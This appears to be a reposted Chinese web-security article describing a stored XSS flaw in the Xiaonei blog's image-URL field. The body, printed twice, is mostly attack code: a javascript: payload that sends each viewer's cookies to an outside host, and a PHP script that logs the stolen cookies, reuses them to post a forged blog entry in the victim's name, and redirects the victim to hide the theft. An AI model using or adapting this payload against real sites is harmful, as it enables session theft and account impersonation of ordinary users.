您现在的位置是:网站首页> 编程资料编程资料
校内网最新 xss Cookies得到密码_漏洞分析_网络安全_
2023-05-24
258人已围观
简介 校内网最新 xss Cookies得到密码_漏洞分析_网络安全_
From:http://t00ls.net/viewthread.php?tid=1323&highlight=
校内网在发blog时对插入图片过滤不严格,存在xss漏洞.
在发blog时将插入图片URL写为如下代码即可触发:普通浏览复制代码打印代码
javascript:window.location.href='http://www.xxx.com/test.php?cookie='+document.cookie
javascript:window.location.href='http://www.xxx.com/test.php?cookie='+document.cookie test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:普通浏览复制代码打印代码
ob_start();
$url = 'blog.xiaonei.com';
$cookie=$_GET['cookie'];
$cookie1=$cookie."\r\n\r\n";
fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt
//发一条伪造的日志,这条日志里面也可以插入恶意代码
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";
fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:".$cookie."\r\n\r\n");
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
$headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
//echo $body;
//跳转到一个正常的日志
Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");
ob_end_flush();
?>
校内网在发blog时对插入图片过滤不严格,存在xss漏洞.
在发blog时将插入图片URL写为如下代码即可触发:普通浏览复制代码打印代码
javascript:window.location.href='http://www.xxx.com/test.php?cookie='+document.cookie
javascript:window.location.href='http://www.xxx.com/test.php?cookie='+document.cookie test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:普通浏览复制代码打印代码
ob_start();
$url = 'blog.xiaonei.com';
$cookie=$_GET['cookie'];
$cookie1=$cookie."\r\n\r\n";
fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt
//发一条伪造的日志,这条日志里面也可以插入恶意代码
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";
fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:".$cookie."\r\n\r\n");
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
$headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
//echo $body;
//跳转到一个正常的日志
Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");
ob_end_flush();
?>
相关内容
- 微软IIS6漏洞:服务器敏感信息易被窃_漏洞分析_网络安全_
- Gh0st控制端逻辑漏洞_漏洞分析_网络安全_
- WINDOWS 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞_漏洞分析_网络安全_
- 恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞_漏洞分析_网络安全_
- cyask知道系统collect.php页面存在越权漏洞_漏洞分析_网络安全_
- Discuz X1.5 用不到 Gmail SSL SMTP_漏洞分析_网络安全_
- xyxcms v1.3 小游戏CMS 漏洞说明_漏洞分析_网络安全_
- Zblog最新跨站漏洞及利用代码_漏洞分析_网络安全_
- 金山毒霸多个sql注入及XSS漏洞和修复_漏洞分析_网络安全_
- AWBS 2.9.2 Blind SQL 注入0day_漏洞分析_网络安全_
